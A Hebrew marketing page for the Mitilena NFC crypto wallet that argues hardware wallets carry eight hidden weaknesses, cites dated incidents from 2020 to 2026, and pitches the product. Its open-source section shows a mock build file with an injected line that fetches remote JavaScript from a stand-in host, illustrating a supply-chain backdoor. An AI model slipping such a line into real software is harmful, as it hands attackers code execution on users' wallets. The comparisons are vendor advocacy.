8 פרצות קוד פתוח רשימת בדיקה שאלות
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS יצירת ארנקיצירה
ארנקים חומרתיים · פרצות לא ברורות

פרצות לא ברורות בארנק חומרתי

אתם קונים מכשיר כדי לסגור חורים. יחד איתו מגיעים חדשים: קושחה, עדכונים, שירות על המחשב, מסך, קופסה, חשבון אצל המוכר. שמונה פרטים שהביקורות רושמות כיתרונות — ושמונה דרכים שבהן דרכם לקחו כסף ב־2020–2026.

מקרים אמיתיים עם תאריכים וסכומים לפי תיעוד היצרנים את הערכה שלנו בודקים מול אותה רשימה
מחיר הטעותמקרים פומביים
2026Coldcard · אקראיות חלשה בקושחה$100M+
2025Bybit · החותמים חתמו על מה שלא ראו$1.5B
2024Dark Skippy · הזרע דולף דרך שתי חתימותמחקר
2023Ledger Connect Kit · דלת אחורית בספרייה$600K
2021אפליקציית ארנק מזויפת ב־App Store17,1 BTC
2020דליפת מאגר לקוחות Ledger · פישינג שנים270,000 אנשים
שמונה פרצות

כל פרט שהביקורות משבחות הוא חור נפרד

ארנק חומרתי סוגר חור אחד: המפתח כבר לא יושב על טלפון עם אינטרנט. אבל המכשיר אינו ריק. יש בו קושחה, עדכונים, תוכנה למחשב, מסך, קופסה, מוכר עם הכתובת שלכם — וכל פרט מוסיף משטח תקיפה שלא היה לכם קודם. למטה שמונה פרטים כאלה: מה כותבים בביקורות, איך דרכם לקחו כסף, איך סוגרים את הפרצה, והאם הפרט הזה קיים בערכה שלנו.

פרצה 01

קושחה שיוצרת את המפתח שלכם

בביקורות: «שבב מאובטח — המפתח נוצר בתוך המכשיר ולעולם לא עוזב אותו»

מפתח הוא מספר אקראי ענק, והקושחה היא שיוצרת אותו. באג אחד שם — ויש הרבה פחות מפתחות ממה שחשבתם: פורצים אותם בכוח גס אצל כל הבעלים בבת אחת, בלי גישה למכשיר, שנים אחרי הקנייה. השבב לא רלוונטי; החור יושב מעליו.

מקרה
$100M+
Coldcard, יולי 2026: באג בבילד הקושחה מאז 2021 החליף בשקט את מחולל האקראיות החומרתי במחולל חלש שנזרע ממספר המכשיר ומטיימר. חוזק המפתחות ירד לכ־40 ביט; יותר מ־5,000 כתובות רוקנו.
איך סוגרים את הפרצה
האם אפשר להביא אקראיות משלכם: הטלות קובייה, ביטוי משלכם. ארנק שמקבל אנטרופיה מכם אינו תלוי בבאג קושחה אחד.
הפרט הזה אין אצלנו
על הכרטיס אין קושחה — זה נושא מוצפן. Mitilena Air יוצר את המפתח ממחולל המערכת של המכשיר, ואתם יכולים לקבוע ביטוי־זרע משלכם במקום מילים אקראיות.
פרצה 02

עדכונים שאתם חייבים להתקין

בביקורות: «היצרן משחרר באופן קבוע עדכוני אבטחה»

כל עדכון הוא רגע שבו אפשר להחליף קושחה. קושחה ששונתה מסתירה שברי זרע בשתיים־שלוש חתימות רגילות, ומבחוץ המכשיר נראה כרגיל. גם לא להתעדכן אי אפשר: חורים מתקנים בדיוק בעדכונים האלה.

מקרה
2 חתימות
Dark Skippy, אוגוסט 2024: חוקרים הראו שקושחה זדונית של ארנק חומרתי יכולה להוציא את כל הזרע דרך שתי עסקאות. עדכון אחד ממקום לא נכון מספיק.
איך סוגרים את הפרצה
מאין מגיעה הקושחה והאם המכשיר בודק את החתימה שלה. הכי טוב כשאין בכלל מה לעדכן.
הפרט הזה אין אצלנו
על הכרטיס אין מה לעדכן ואין מה להחליף. החתימה קורה באפליקציה בטלפון; הבילדים שלה חתומים ומגיעים מ־App Store ו־Google Play — כמו כל אפליקציה שאתם רואים וסוגרים בעצמכם.
פרצה 03 · תרגישו את האבסורד
בביקורות: «אפליקציית שולחן עבודה נוחה של היצרן»

ארנק לחוסר אמון שאליו מצורף שירות רקע

אתם קונים מכשיר מסיבה אחת: כדי להפסיק לסמוך על המחשב. כדי שהוא יעבוד צריך להתקין שירות רקע על אותו מחשב. לא כתבתם אותו, לא הפעלתם אותו, ואתם לא שולטים בו: הוא עולה עם מערכת ההפעלה, מאזין לפורט שכל תוכנה במכונה יכולה לדפוק עליו, ועושה משהו עכשיו — מה בדיוק, אתם לא יודעים ולעולם לא תבדקו.

הוא המשיך לרוץ ברקע אחרי שסגרתם את הארנק. שנים. אצל אחד היצרנים הגדולים זו הייתה שירות־«גשר» נפרד; ב־2025 הסתירו אותו בתוך האפליקציה עצמה — השירות עדיין שם, פשוט מת עם החלון. אצל רוב האחרים, בלי תוכנה למחשב המכשיר הוא מחזיק מפתחות. ב־Linux הוסיפו כללי udev, אחרת המערכת לא תמסור את ה־USB.

כלומר הדבר שקניתם כדי להפסיק להיות תלויים בתוכנות מחשב לא עובד בלי תוכנת מחשב. ולא זו שאתם רואים — אלא זו שרצה מתחתיה.

הפרט הזה אין אצלנו
על המחשב לא מותקן כלום: לא שירות, לא דרייבר, לא פורט. המתווך הוא שבב ה־NFC שכבר נמצא בטלפון, מתוצרת יצרן הטלפון וכפוף למערכת ההפעלה: הוא עובד רק כשהאפליקציה פתוחה ואתם בעצמכם מצמידים את הכרטיס, והטלפון מבקש הרשאה בכל פעם. הכרטיס פסיבי: בלי סוללה, בלי רדיו, הוא לא עושה כלום לבד. סגרתם את האפליקציה — לא נשאר כלום שרץ בלעדיכם. בכנות: אפליקציה בטלפון עדיין נחוצה, והיא כמו כל אחרת — אתם רואים אותה, מפעילים וסוגרים בעצמכם. אף אחד לא גר במחסן השירות.
ניטור מערכתהארנק סגור
תהליךמצבפועל
HW Wallet Appארנק
נסגר על ידכם-
hwwalletdשירות רקע · גשר USB
פועל412d 06:14
הופעל על ידי המערכת בכניסהאי אפשר לסגור — זה שירות
מאקט; השמות להמחשה. כך נראה מחשב עם אחד מארנקי ה־USB הפופולריים לפני 2025; אחר כך ה«גשר» נבנה לתוך האפליקציה עצמה — אותו שירות, פשוט כבר ��א נראה ברשימה.
אלגוריה
בית למען פרטיות — ודייר במחסן השירות

רציתם בית למען פרטיות. קניתם. אחר כך נדרשה שמירה — התקנתם. וכדי שתעריף השמירה יעבוד, ביקשו להכניס לבית אדם במדים שגר במחסן השירות מסביב לשעון, מחזיק מפתחות לכל הדלתות ומדווח למישהו אחר. לא שכרתם אותו, אי אפשר לפטר אותו, ומה הוא עושה בלילה — אתם לא יודעים.

הוא «משלנו», כמובן. כך כתוב בחוזה. רציתם פרטיות וקיבלתם תחליף: בית עם דייר שלא בחרתם.

פרצה 04 · קוד פתוח אינו ביקורת
בביקורות: «קוד פתוח — כל אחד יכול לבדוק»

קוד פתוח הוא איך מתכנתים עובדים יחד, לא תג שאומר שהתוכנה לא גונבת

קוד פתוח הומצא כדי שאנשים ישתפו ת��כנות ויתקנו אותן יחד. ככלי שיתוף פעולה הוא מצוין. הוא מעולם לא היה חותם איכות ש«התוכנה הזו לא תגנוב לכם כסף», והנה למה: אתם לא משתמשים בקוד המקור. אתם משתמשים במה שהורדתם.

בין ריפו ב־GitHub לקובץ בטלפון עומדים הבילד, חנות האפליקציות, העדכון, השרת. בכל אחד מהשלבים האלה יכולה להיכנס שורה אחת שמושכת מה שרוצים מכל מקום — ובריפו היא לא תהיה. אי אפשר להשוות את העותק שלכם למקור: החנויות מוסרות קובץ מקומפל; ארנק ווב מקבל את הקוד שהשרת החליט לשלוח לכם היום; תוסף דפדפן מתעדכן בשקט בלילה.

«פתוח» אומר שחלק מהאנשים יכולים לבדוק איזושהי גרסה באיזשהו יום. מה העותק שלכם עושה עכשיו — זה לא אומר.

בריפו · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
אצלכם בטלפון · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
שורה אחת בבילד. אין בריפו, לא נראית בחנות, רצה אצלכם במכשיר.
פתיחות לא עצרה אף אחד מהמקרים האלה
Ledger Connect Kit2023
ספרייה פתוחה ב־GitHub; גרסה זדונית פורסמה ב־npm; עשרות אתרים טענו אותה בשידור חי תוך שעות
Copay / event-stream2018
ארנק פתוח; הדלת האחורית הגיעה דרך תלות שכוונה אליו במיוחד
xz utils2024
פתוח עשרים שנה; דלת אחורית ישבה בריליזים עד שמהנדס אחד שם לב שהכניסה ב־SSH איטית בחצי שנייה
Coldcard2026
קושחה בקוד פתוח; באג בבילד חמש שנים החליף את מחולל האקראיות החומרתי בחלש — מפתחות נפרצו בכוח גס בלי גישה למכשיר, יותר מ־5,000 כתובות, $100M+
מה באמת עובד
לא קריאת קוד של מישהו אחר — שתי בדיקות שכל אחד יכול להריץ. ראשונה, ביקורת התנהגות: שימו פרוקסי מיירט על המחשב, העבירו דרכו את האפליקציה, וראו מה היא שולחת ולאן. אין צורך לקרוא קוד — התעבורה נראית במלואה. שנייה, ארכיטקטורה שבה לקוד אין מה לגנוב: אם המפתח לעולם לא יושב על מכשיר עם רשת, כל שורה בכל עדכון חסרת כוח — אין לה מה לשלוח.
איך אצלנו
את הראשונה אנחנו מציעים בעצמנו: העבירו את האפליקציה שלנו דרך פרוקסי, את גרסת הווב דרך DevTools בדפדפן, ובדקו כל בקשה. מפתח החתימה והזרע לא יופיעו; הסייג היחיד הוא מפתח ה־view של Monero — מכוסה בעמוד «איך הארנק שולח קריפטו». השנייה בערכה: המפתח נולד ב־Mitilena Air על מכשיר בלי אינטרנט, חי על הכרטיס, ורק החתימה מגיעה לאפליקציה המקוונת — אין שם מה ליירט. והאופליין כאן אמיתי: במצב air-gap מכשיר המפתח לא מחובר לכלום — לא כבל, לא Bluetooth; העסקה נכנסת ויוצאת כקוד QR שאתם רואים בעיניים. לא ארנק «קר» על כבל שתלוי ממחשב מקוון עם שירות משלו שמחליף מי־יודע־מה.
פרצה 05

מסך שלא מראה מה אתם חותמים

בביקורות: «אישור על מסך המכשיר — וירוס במחשב חסר אונים»

המסך קטן, ולעתים קרובות מופיע עליו האש או «קריאת חוזה», לא הכתובת והסכום. אתם מאשרים מה שאינכם רואים — והחתימה עדיין כנה, שלכם. המסך נותן תחושת שליטה שאין.

מקרה
$1.5B
Bybit, פברואר 2025: חותמים עם ארנקים חומרתיים אישרו העברה שנראתה רגילה בממשק. המכשירים הציגו נתונים שאדם לא יכול היה לאמת.
איך סוגרים את הפרצה
נמען, סכום וסוג פעולה בשפה אנושית — לא האש — ודחייה בלחיצה אחת.
איך אצלנו
יש מסך, אבל זה מסך הטלפון: כתובת, סכום וסוג בקשה במילים — העברה, קריאת חוזה, אישור — וכפתור «דחייה». לסכומים גדולים — מכשיר נפרד בלי רשת שמקבל את העסקה במלואה.
פרצה 06

קופסה שכבר יש בה זרע

בביקורות: «מגיע בקופסה חתומה עם חותם אבטחה»

מכשיר פיזי פירושו משלוח, מתווכים ומרקטפלייסים «במבצע». הארנק מגיע כבר מוגדר, עם זרע על פתק בפנים. או שאפליקציה כפולה בחנות מבקשת «להזין את הזרע להפעלה».

מקרה
17,1 BTC
App Store, 2021: בעל ארנק חומרתי הזין את הזרע באפליקציה כפולה ואיבד 17.1 BTC. באותה שנה, אחרי דליפת המאגר, ללקוחות Ledger נשלחו מכשירים מזויפים עם מכתב «העבירו את הזרע לחדש».
איך סוגרים את הפרצה
אתחלו בעצמכם ואל תשתמשו בזרע שהגיע כבר כתוב. חותם אינו אימות; אימות הוא שאתם יוצרים את המפתח.
איך אצלנו
הכרטיסים מגיעים רי��ים: אתם יוצרים את המפתח וכותבים אותו בעצמכם — לא יכול להיות זרע מוכן בקופסה. האפליקציה מגיעה רק מ־App Store ו־Google Play דרך קישורים באתר; היא מבקשת זרע רק בייבוא ובחתימה.
פרצה 07

חשבון אצל המוכר

בביקורות: «אחריות רשמית, תמיכה וחשבון אישי»

כדי לקנות את המכשיר אתם מוסרים ליצרן שם, אימייל וכתובת למשלוח. האבטחה שלכם תלויה עכשיו במאגר שלהם. אם הוא דולף — שנים תקבלו הודעות «לאשר את הזרע במכשיר חדש», לפעמים עם חבילות.

מקרה
270,000 אנשים
Ledger, 2020: נתונים על 270,000 קונים דלפו, כולל כתובות דואר. מיילים, שיחות וחבילות שמבקשים «להעביר» את הזרע נמשכים עד היום.
איך סוגרים את הפרצה
ככל שהם יודעים עליכם פחות, הווקטור קצר יותר: קנייה בלי חשבון, תמיכה שלעולם לא מבקשת זרע, והכלל «רק גנב מבקש את הזרע».
הפרט הזה אין אצלנו
הארנק עובד בלי הרשמה — בלי חשבון. המוכר יודע רק את כתובת המשלוח. לא התמיכה ולא האפליקציה מבקשות זרע.
פרצה 08

מכשיר אחד ופתק נייר אחד

בביקורות: «מעטפת קשיחה, מסך גדול, סוללה לשבוע»

ככל שיש יותר חלקים, כך יותר תקלות: מחבר, מסך, סוללה. השחזור תל��י בפתק זרע אחד — נרטב, אבד במעבר דירה, צולם «ליתר ביטחון». הסיבה הנפוצה ביותר לאובדן אינה פריצה.

מקרה
≈20 % BTC
Chainalysis מעריכים שכחמישית מכל הביטקוין אבדה לנצח — בעיקר ממפתחות שאבדו, לא מפריצות.
איך סוגרים את הפרצה
כמה עותקי מפתח מגיעים בקופסה ובאיזה צורה, מה קורה אם המכשיר אבד, והאם יש בו משהו שיכול להישבר.
הפרט הזה אין אצלנו
בלי מסך, סוללה או מחבר — אין מה לשבור. ולא עותק אחד: חמישה עותקי מראה בקופסה — שני כרטיסי NFC ושלושה מדבקות חשאיות בפלסטיק עמיד למים, יותר מ־10 שנים.
רשימת בדיקה

מה שלא אמור להיות בארנק

שמונה פרטים לשמונה פרצות. הרשימה מתאימה לכל ארנק — חומרתי, נייד, דפדפן. סמנו מה יש בזה שאתם בוחרים — וגם אצלנו.

01
מפתח שנוצר רק בתוכנהבלי אקראיות משלכם — הביטוי או הקוביות שלכם
02
עדכונים במקום שבו חי המפתחכל עדכון הוא הזדמנות להחליף קוד
03
שירות, דרייבר או פורט על המחשבראו פרצה 03
04
תג «קוד פתוח» במקום ארכיטקטורההמפתח יושב במקום שקוד זר יכול להגיע אליו
05
מסך שמציג האש במקום כתובת וסכוםובלי כפתור דחייה
06
זרע שהגיע כבר כתובבקופסה, במכתב, ב«אפליקציית הפעלה»
07
חשבון אצל המוכרותמיכה שעלולה לבקש את הזרע
08
עותק יחיד וחלקים שנשבריםמסך, סוללה, מחבר, פתק נייר אחד
ברשימה הזו, לערכת Ultimate אין אף אחד משמונת הפרטים. בקופסה: 2 כרטיסי NFC ו־3 מדבקות חשאיות, Mitilena Air (מפתחות בלי אינטרנט) ו־Mitilena Keys (חתימה בלי אינטרנט). הכרטיסים מגיעים ריקים: אתם יוצרים ומצפינים את המפתח — לא שבב מפעל. תוכן ומחיר ←
Ultimate · ערכה אופליין

לא «שבב מאובטח» מהמפעל — נושא שאתם מצפינים

הכרטיסים מגיעים ריקים. אתם יוצרים את המפתח ב־Mitilena Air על טלפון בלי אינטרנט וכותבים אותו בעצמכם. החתימה דרך Mitilena Keys, גם אופליין: העסקה עוברת ב־QR. חמישה עותקים זהים בקופסה: 2 כרטיסי NFC ו־3 מדבקות חשאיות בפלסטיק עמיד למים. 18 רשתות, יותר מ־20,000 מטבעות, כולל USDT.

כלום לא מותקן על המחשב
בלי קושחה, עדכונים, מסך או סוללה
עסקה לטלפון אופליין — בצליל א�� QR, בלי כבל או USB
עובד עם אפליקציית Mitilena החינמית בטלפון
פלסטיק עמיד למים, חיי מדף של יותר מ־10 שנים
משלוח לכל העולם · mitilena-store.com
Mitilena NFC card
Ultimate · יצירה וחתימה אופליין
€369€439
2 כרטיסי NFC · 3 מדבקות חשאיות · Mitilena Air · רישיון Mitilena Keys
קנו Ultimate · €369 Basic ו־Premium — כל התוכניות
שאלות

מה שואלים אחרי שקראו עד כאן

ארנק חומרתי יתרונות וחסרונות — בקצרה?

יתרון גדול אחד: המפתח לא על טלפון עם אינטרנט. החסרונות הם שמונת הפרטים למעלה — כל אחד מוסיף משטח תקיפה. ארנק חומרתי טוב הוא זה שיש בו פחות פרטים, לא יותר.

מה אם הטלפון נפרץ?

עם כרטיס על הטלפון הראשי המפתח מופיע בסביבה מבודדת לשנייה של החתימה — אותו סיכון כמו בכל ארנק טלפון, רק קצר יותר. לסכומים שמפחידים אתכם — שכבה שנייה: חתימה על מכשיר אופליין נפרד שהעסקה מגיעה אליו ב־QR.

מה אם הכרטיס נגנב או אבד?

בלי הסיסמה הכרטיס והמדבקה הם פלסטיק חסר תועלת — המפתח עליהם מוצפן. עותק שאבד מוחלף בארבעת האחרים: שני כרטיסים ושלוש מדבקות מהקופסה הם מראות.

צריך לעדכן קושחה של ארנק חומרתי?

אם היצרן סגר חור — כן, וזה בדיוק הרגע שבו אפשר להחליף קושחה: בדקו את המקור ואת החתימה. לנושא בלי קושחה אין בחירה כזו — אין מה לעדכן, אין מה להחליף.

במה זה שונה מארנק USB?

פחות מתווכים: בלי כבל, דרייבר, שירות רקע או תוכנת שולחן עבודה. מתווך אחד — שבב ה־NFC של הטלפון — והוא עונה לכם ולמערכת ההפעלה, לא ליצרן הארנק.

קוד פתוח אומר בטוח?

זה אומר שמישהו יכול לבדוק מתישהו. אתם משתמשים לא בקוד אלא במה שהורדתם, ואי אפשר להשוות אחד לשני. הבטיחות באה מארכיטקטורה שבה המפתח לא במקום שקוד זר יכול להגיע אליו.

כרטיסי NFC עם יצירה וחתימה אופליין

5 עותקי מפתח · Air · Keys · או ארנק חינם ב־30 שניות · למה ארנק חומרתי «קר» שמבוסס על שבב היצרן הוא לעתים קרובות מזויף →
קנו Ultimate · €369 צרו ארנק חינם